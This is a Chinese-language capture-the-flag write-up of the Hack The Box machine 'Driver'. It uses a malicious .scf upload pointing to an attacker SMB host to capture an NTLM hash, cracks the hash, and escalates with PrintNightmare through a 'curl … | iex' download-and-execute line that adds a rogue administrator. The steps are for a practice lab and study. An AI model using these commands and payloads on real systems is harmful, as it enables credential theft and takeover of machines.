Driver-htb-writeup

0x00 靶场技能介绍

章节技能:.scf恶意利用、responder、hashcat、evil-winrm、winPEASany.exe、CVE-2021-1675

参考链接:https://0xdf.gitlab.io/2022/02/26/htb-driver.html

0x01 用户权限获取

1、靶机介绍

关于司机
Driver 是一台简单的 Windows 机器,专注于打印机开发。对机器的枚举显示,Web 服务器正在监听端口 80,同时 SMB 正在监听端口 445,WinRM 正在监听端口 5985。导航到该网站显示,它使用基本 HTTP 身份验证受到保护。在尝试常用凭据时,admin:admin 凭据被接受,因此我们能够访问该网页。该网页提供了一项功能,可以将打印机固件上传到 SMB 共享上,以供远程团队进行测试和验证。上传包含从本地机器获取远程文件的命令的 Shell 命令文件会导致用户 tony 的 NTLM 哈希被转发回给我们。破解捕获的哈希以检索纯文本密码,我们能够使用 WinRM 以 tony 身份登录。然后,切换到 meterpreter 会话,发现该机器容易受到本地特权攻击,该攻击会滥用远程机器上存在的特定打印机驱动程序。利用该漏洞,我们可以获得“NT AUTHORITY\SYSTEM”身份的会话。

2、首先,扫描开放端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -Pn 10.10.11.106 --min-rate=10000      
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 15:07 CST
Nmap scan report for 10.10.11.106
Host is up (0.32s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 28.60 seconds
                                                                                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,135,445,5985 -Pn 10.10.11.106 --min-rate=10000 -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 15:08 CST
Nmap scan report for 10.10.11.106
Host is up (0.20s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h49m00s, deviation: 0s, median: 6h49m00s
| smb2-time: 
|   date: 2024-09-26T13:58:10
|_  start_date: 2024-09-26T13:53:33

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.85 seconds

3、绑定本地hosts信息

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.106 driver.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.106 driver.htb

4、访问首页信息

http://10.10.11.106/

5、发现上传文件的页面

http://10.10.11.106/fw_up.php

6、这里我实在没啥思路,就参考的演练报告里的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
该页面显示我上传的内容将进入他们的文件共享。这意味着它不一定会进入网络服务器,因此寻找上传 webshell 的方法没有多大意义。

当您拥有文件共享的写权限时,经典的攻击是将.scf引用图标文件的文件放在攻击者控制的主机上的 SMB 共享上。如果使用.scf文件资源管理器打开包含该文件的文件夹,则会.scf激发资源管理器重新连接以获取该图标文件,并提供 Net-NTLMv2 身份验证协商。如果我控制该主机,我可以捕获该交换并尝试使用离线暴力破解(如)破解 Net-NTLMv2 。我在 2019 年在 Insane 机器Sizzlehashcat上使用过这种技术。

SCF 文件是 Windows Shell 命令文件,关于如何制作恶意 SCF 文件的信息比合法使用的信息要多得多。一些旧的 Microsoft 页面(已不存在,但在 Wayback Machine 上)展示了如何使用 SCF 文件创建“显示桌面快捷方式”和“查看频道快速启动”。格式为:


[Shell]
Command=2
IconFile=<icon file>
[<thing you want to control>]
Command=<command>


我会滥用这个IconFile位,但让它通过 SMB 指向我的服务器,并创建0xdf.scf:

[Shell]    
Command=2    
IconFile=\\10.10.14.6\evil.exe,3

7、这里我就参考演练报告里的内容进行尝试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
POST /fw_up.php HTTP/1.1
Host: 10.10.11.106
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------25319977892483335616582605058
Content-Length: 420
Origin: http://10.10.11.106
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://10.10.11.106/fw_up.php
Upgrade-Insecure-Requests: 1

-----------------------------25319977892483335616582605058
Content-Disposition: form-data; name="printers"

HTB DesignJet
-----------------------------25319977892483335616582605058
Content-Disposition: form-data; name="firmware"; filename="shiyan.scf"
Content-Type: text/x-python

[Shell]    
Command=2    
IconFile=\\10.10.14.22\evil.exe,3   



-----------------------------25319977892483335616582605058--

8、接收监听捕获信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo responder -I tun0
[sudo] kali 的密码:
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.22]
    Responder IPv6             [dead:beef:2::1014]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-OKBY9DM9SSA]
    Responder Domain Name      [P0NL.LOCAL]
    Responder DCE-RPC Port     [45353]

[+] Listening for events...                                                                                                                                

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:37a4f8ca589ef785:E33C2CAE05048658E83212D19966E75A:01010000000000008091CF383510DB011E905D99221F88620000000002000800500030004E004C0001001E00570049004E002D004F004B0042005900390044004D00390053005300410004003400570049004E002D004F004B0042005900390044004D0039005300530041002E00500030004E004C002E004C004F00430041004C0003001400500030004E004C002E004C004F00430041004C0005001400500030004E004C002E004C004F00430041004C00070008008091CF383510DB0106000400020000000800300030000000000000000000000000200000DDD9163C57AA9ADB5DEACFAB59DDA86976FE8C4ECED723121160197199162ADA0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003200000000000000000000000000                                                
[*] Skipping previously captured hash for DRIVER\tony

9、到这里就捕获到了NTLMv2内容,接下来开始破解哈希

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat hash -m 5600 /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1438/2941 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

TONY::DRIVER:37a4f8ca589ef785:e33c2cae05048658e83212d19966e75a:01010000000000008091cf383510db011e905d99221f88620000000002000800500030004e004c0001001e00570049004e002d004f004b0042005900390044004d00390053005300410004003400570049004e002d004f004b0042005900390044004d0039005300530041002e00500030004e004c002e004c004f00430041004c0003001400500030004e004c002e004c004f00430041004c0005001400500030004e004c002e004c004f00430041004c00070008008091cf383510db0106000400020000000800300030000000000000000000000000200000ddd9163c57aa9adb5deacfab59dda86976fe8c4eced723121160197199162ada0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0032003200000000000000000000000000:liltony
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TONY::DRIVER:37a4f8ca589ef785:e33c2cae05048658e8321...000000
Time.Started.....: Thu Sep 26 17:03:02 2024 (0 secs)
Time.Estimated...: Thu Sep 26 17:03:02 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   628.6 kH/s (0.58ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 31744/14344385 (0.22%)
Rejected.........: 0/31744 (0.00%)
Restore.Point....: 30720/14344385 (0.21%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: !!!!!! -> 225566
Hardware.Mon.#1..: Util: 25%

Started: Thu Sep 26 17:02:53 2024
Stopped: Thu Sep 26 17:03:03 2024

10、到这里尝试下该密码是否正确

1
2
3
4
5
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.11.106 -u tony -p liltony    
SMB         10.10.11.106    5985   DRIVER           [*] Windows 10 Build 10240 (name:DRIVER) (domain:DRIVER)
HTTP        10.10.11.106    5985   DRIVER           [*] http://10.10.11.106:5985/wsman
WINRM       10.10.11.106    5985   DRIVER           [+] DRIVER\tony:liltony (Pwn3d!)

11、可以,那就直接登录吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.106 -u tony -p liltony                                                                      
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> whoami
driver\tony
*Evil-WinRM* PS C:\Users\tony\Documents> cd ../
*Evil-WinRM* PS C:\Users\tony> dir


    Directory: C:\Users\tony


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        6/11/2021   7:01 AM                Contacts
d-r---         9/7/2021  10:15 PM                Desktop
d-r---         9/8/2021  12:37 AM                Documents
d-r---        6/11/2021   7:05 AM                Downloads
d-r---        6/11/2021   7:01 AM                Favorites
d-r---        6/11/2021   7:01 AM                Links
d-r---        6/11/2021   7:01 AM                Music
d-r---         8/6/2021   7:34 AM                OneDrive
d-r---        6/11/2021   7:03 AM                Pictures
d-r---        6/11/2021   7:01 AM                Saved Games
d-r---        6/11/2021   7:01 AM                Searches
d-r---        6/11/2021   7:01 AM                Videos


*Evil-WinRM* PS C:\Users\tony>

12、获取第一个flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\tony> cd Desktop
*Evil-WinRM* PS C:\Users\tony\Desktop> dir


    Directory: C:\Users\tony\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/26/2024   6:54 AM             34 user.txt


*Evil-WinRM* PS C:\Users\tony\Desktop> type user.txt
f9ce1a606eea2b1270eb4b2352b514ab
*Evil-WinRM* PS C:\Users\tony\Desktop>

0x02 系统权限获取

13、通过枚举,上传winPEASany.exe工具进行扫描,发现了一些内容

1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\tony\Desktop> upload /home/kali/Desktop/tools/PEASS-ng/winPEASany.exe
                                        
Info: Uploading /home/kali/Desktop/tools/PEASS-ng/winPEASany.exe to C:\Users\tony\Desktop\winPEASany.exe
                                        
Data: 3168256 bytes of 3168256 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\tony\Desktop> 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
*Evil-WinRM* PS C:\Users\tony\Documents> type C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'

ping 1.1.1.1
ping 1.1.1.1
*Evil-WinRM* PS C:\Users\tony\Documents> 


*Evil-WinRM* PS C:\Users\tony\Documents> type C:\Users\tony\appdata\local\job\job.bat
@echo off

:LOOP

%SystemRoot%\explorer.exe "C:\firmwares"

ping -n 20 127.0.0.1 > nul && powershell -ep bypass c:\users\tony\appdata\local\job\quit.ps1

DEL /q C:\firmwares\*

cls

GOTO :LOOP

:EXIT
*Evil-WinRM* PS C:\Users\tony\Documents>

14、发现一个命令和任务,这里我检索了下命令里的名称

15、发现应该是可以利用的,下面是两个利用链接

1
2
3
https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/

https://www.exploit-db.com/exploits/48036

16、但是不知道为啥各种利用不成功,然后我就又换了一个CVE漏洞进行尝试

https://github.com/calebstewart/CVE-2021-1675

17、下面是尝试利用的过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.10.11.106 - - [26/Sep/2024 18:11:49] "GET /CVE-2021-1675.ps1 HTTP/1.1" 200 -


*Evil-WinRM* PS C:\temp> curl 10.10.14.22:8081/CVE-2021-1675.ps1 -UseBasicParsing | iex
*Evil-WinRM* PS C:\temp> Get-Command Invoke-Nightmare

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Function        Invoke-Nightmare


*Evil-WinRM* PS C:\temp> Invoke-Nightmare -NewUser "shiyan" -NewPassword "MM123456"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user shiyan as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
*Evil-WinRM* PS C:\temp> net user shiyan
User name                    shiyan
Full Name                    shiyan
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/26/2024 10:01:27 AM
Password expires             Never
Password changeable          9/26/2024 10:01:27 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

*Evil-WinRM* PS C:\temp>

18、使用新建的账号进行登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.106 -u shiyan -p MM123456
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\shiyan\Documents> cd C:\Users\Administrator
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/26/2024   6:54 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop>

19、获取最终的flag信息

1
2
3
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
32cb5f50c7d8be2871973dbac57f10d0
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/387

打靶记
#shooting-range
Driver-htb-writeup
https://sh1yan.top/2024/09/26/Driver-htb-writeup/
作者
shiyan
发布于
2024年9月26日
许可协议